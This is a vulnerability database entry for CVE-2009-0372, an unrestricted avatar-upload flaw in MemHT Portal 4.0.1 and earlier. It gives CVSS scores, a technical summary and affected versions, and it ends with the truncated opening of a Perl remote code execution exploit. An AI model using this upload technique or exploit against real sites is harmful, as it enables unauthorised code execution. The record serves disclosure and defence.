6.5
CVSSv2

CVE-2009-0372

Published: 30/01/2009 Updated: 29/09/2017
CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8
VMScore: 655
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Vulnerability Summary

Unrestricted file upload vulnerability in index.php in Miltenovik Manojlo MemHT Portal 4.0.1 and previous versions allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension and an image content type via a users editProfile action, then accessing this file via a direct request to the file in images/avatar/uploaded/.

Vulnerable Product Search on Vulmon Subscribe to Product

memht memht portal 3.4.5

memht memht portal 1.5

memht memht portal 2.5

memht memht portal 3.4

memht memht portal 3.0

memht memht portal 3.8.5

memht memht portal 3.3

memht memht portal 3.8.1

memht memht portal 3.8.0

memht memht portal 2.9

memht memht portal 3.1

memht memht portal 3.6.0

memht memht portal

memht memht portal 1.0

memht memht portal 3.7.5

memht memht portal 3.7.0

memht memht portal 3.6.5

memht memht portal 3.5.0

memht memht portal 2.0

memht memht portal 3.2

memht memht portal 3.9.0

Exploits

#!/usr/bin/perl # MemHT Portal <= 401 (avatar) Remote Code Execution Exploit # by yeat - staker[at]hotmail[dot]it use Getopt::Std; use Digest::MD5('md5_hex'); use LWP::UserAgent; getopts('p:',\my %opts); my ($host,$file,$id,$username,$password) = @ARGV; my $http = new LWP::UserAgent; my $u_agent = "Lynx (textmode)"; my $cookies = "login_ ...